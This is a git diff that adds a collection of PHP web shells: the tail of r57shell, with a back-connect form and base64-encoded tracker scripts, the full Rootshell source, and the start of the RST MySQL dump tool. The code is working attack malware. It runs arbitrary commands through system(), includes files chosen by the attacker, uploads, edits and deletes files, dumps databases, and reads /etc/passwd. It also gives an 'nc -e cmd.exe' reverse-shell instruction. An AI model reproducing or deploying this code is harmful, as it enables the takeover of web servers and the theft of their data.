+echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* back connect form */
+echo $table_up1; echo $lang[$language._text12]; echo $table_up2;
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text13]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text14]." <font face=Wingdings color=gray>�</font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".$lang[$language._text20]." <font face=Wingdings color=gray>�</font>&nbsp;</b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=submit value=\" ".$lang[$language._butt4]." \">";
+echo "</font>";
+echo "</form>";
+echo $table_end1;
+
+/* (c) */
+echo $table_up3;
+echo "<div align=center><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RusH security team | <a href=http://rst.void.ru>http://rst.void.ru</a> | version 1.1 ]---o</b></font></div>";
+echo $table_end1;
+
+print base64_decode("PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK0
+1hdGgucmFuZG9tKCkrIiZzPTgxNjA2JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3a
+W5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2llPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhk
+b2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2p
+zPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L3NjcmlwdD48c2NyaXB0IG
+xhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgrJ3gnK
+3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5j
+b2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGx
+vZ19qcz0iMS4zIjwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2
+pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwOi8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48a
+W1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hvdGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3Jk
+ZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSBocmVmPWh0dHA6Ly9jbGljay5
+ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hvdGxvZy
+9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2Nya
+XB0Pg==");
+
+print base64_decode("PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PC
+EtLQ0KZG9jdW1lbnQud3JpdGUoJzxhIGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3Rhcmdld
+D1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnlhZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5y
+ZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJztzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5
+oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKSkrJzsnK0
+1hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u8eXy6
+PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0v
+TGl2ZUludGVybmV0LS0+");
+
+/* -------------------------[ EOF ]------------------------- */
+
+?>
diff --git a/xakep-shells/PHP/rootshell.php.txt b/xakep-shells/PHP/rootshell.php.txt
new file mode 100644
index 0000000..202d779
--- /dev/null
+++ b/xakep-shells/PHP/rootshell.php.txt
@@ -0,0 +1,349 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*    1.3.3          666            added "File Editor"
+/*    2.0.0          666            added "Notices"
+/*    2.0.0          666            added some new modules
+/*    2.0.0          666            made some design updates
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "shells.dl.am";                                                      // Insert your nick
+$version      = "2.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
+} else {
+   print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center">
+      <br>
+<div align="center" style="overflow:auto; width:99%; height:175">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
+}
+closedir($folder);
+?>
+</div><p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center"><?
+$scriptname = $_SERVER['SCRIPT_NAME'];
+$filename = $_POST["filename"];
+
+if($_POST["submit"] == "Open")
+{
+	if(file_exists($filename))
+	{
+		$filecontents = htmlentities(file_get_contents($filename));
+
+		if(!$filecontents)
+			$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}		
+else if($_POST["submit"] == "Delete")
+{
+	if(file_exists($filename))
+	{
+		if(unlink($filename))	
+			$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
+		else
+			$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}
+else if($_POST["submit"] == "Save")
+{
+	$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
+
+	if(file_exists($filename))
+		unlink($filename);
+
+	$handle = fopen($filename, "w");
+
+	if(!$handle)
+		$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
+	else
+	{
+		if(!fwrite($handle, $filecontents))
+			$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
+
+		fclose($handle);
+	}
+
+	$filecontents = htmlentities($filecontents);
+}
+else
+{
+	$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
+}
+?>
+<table border="0" align="center">
+		
+		<tr>
+			<td>
+				<table width="100%" border="0">
+				<tr>
+					<td>
+						<form method="post" action="<?echo $scriptname;?>">
+							<input name="filename" type="text" value="<?echo $filename;?>" size="20">
+							<input type="submit" name="submit" value="Open">
+							<input type="submit" name="submit" value="Delete">
+					</td>
+				</tr>
+				</table>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+					<font face="Verdana" style="font-size: 11pt">
+					<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
+					<input type="submit" name="submit" value="Save">
+					<input type="reset" value="Reset">
+				</form>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+				<h2><?echo $status;?></h2>
+			</td>
+		</tr>
+		</table>				</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+<textarea rows="13" cols="55"></textarea><br>
+      &nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  � 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.org">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div>
\ No newline at end of file
diff --git a/xakep-shells/PHP/rst_sql.php.php.txt b/xakep-shells/PHP/rst_sql.php.php.txt
new file mode 100644
index 0000000..c26a3c4
--- /dev/null
+++ b/xakep-shells/PHP/rst_sql.php.php.txt
@@ -0,0 +1,1694 @@
+<?php
+error_reporting(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@set_magic_quotes_runtime(0); //���������� �� ������ ��� ��������� ������ �� �����
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+if(!ini_get("register_globals")){ 
+import_request_variables("GPC"); 
+}
+//���� php ������� �����, ���������� �� ���.����� ����� ������� ��� �� ���������� 
+//��������, ��� � �� ���� ����������, ������� ���������� ��� register_globals=on
+if (get_magic_quotes_gpc()) strips($GLOBALS);
+function strips(&$el) { 
+  if (is_array($el)) { 
+    foreach($el as $k=>$v) { 
+      if($k!='GLOBALS') { 
+        strips($el[$k]); 
+      } 
+    } 
+  } else { 
+    $el = stripslashes($el); 
+  } 
+}
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+    $file = "C:\\tmp\\dump_".$db.".sql";
+    $p_v=$SystemRoot."\my.ini";
+    $os="win";
+} else {
+    $file = "/tmp/dump_".$db.".sql"; 
+    $p_v="/etc/passwd";
+}
+if ($HTTP_GET_VARS['send']=='send_http') {
+function download($file, $type = false, $name = false, $down = false) { 
+if(!file_exists($file)) exit; 
+if(!$name) $name = basename($file); 
+if($down) $type = "application/force-download"; 
+else if(!$type) $type = "application/download"; 
+$disp = $down ? "attachment" : "inline";
+header("Content-disposition: ".$disp."; filename=".$name); 
+header("Content-length: ".filesize($file)); 
+header("Content-type: ".$type); 
+header("Connection: close"); 
+header("Expires: 0");
+set_time_limit(0); 
+readfile($file); 
+unlink($file);
+exit; 
+} 
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if (sizeof($tabs) == 0) { 
+      // �������� ������ ������ ���� 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");        
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+}
+if ($HTTP_GET_VARS['strukt']=='t_strukt'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp);
+}
+if ($HTTP_GET_VARS['strukt']=='d'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+   $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   $fp = fopen($file, "w"); 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+   fclose($fp); 
+}
+download($f_dump);
+}
+function send_header() {
+   header("Content-type: image/gif");
+   header("Cache-control: public");
+   header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+   header("Cache-control: max-age=".(60*60*24*7));
+   header("Last-Modified: ".date("r",filemtime(__FILE__)));
+}
+if ($HTTP_GET_VARS['img']=='st_form_bg') {
+   $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
+   send_header();
+   echo base64_decode($st_form_bg);
+}
+if ($HTTP_GET_VARS['img']=='bg_f') {
+$bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
+      'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
+      'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
+   send_header();
+   echo base64_decode($bg_f);
+}
+if ($HTTP_GET_VARS['img']=='b_close') {
+$b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
+         'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
+         'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
+         'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
+         'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
+         '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
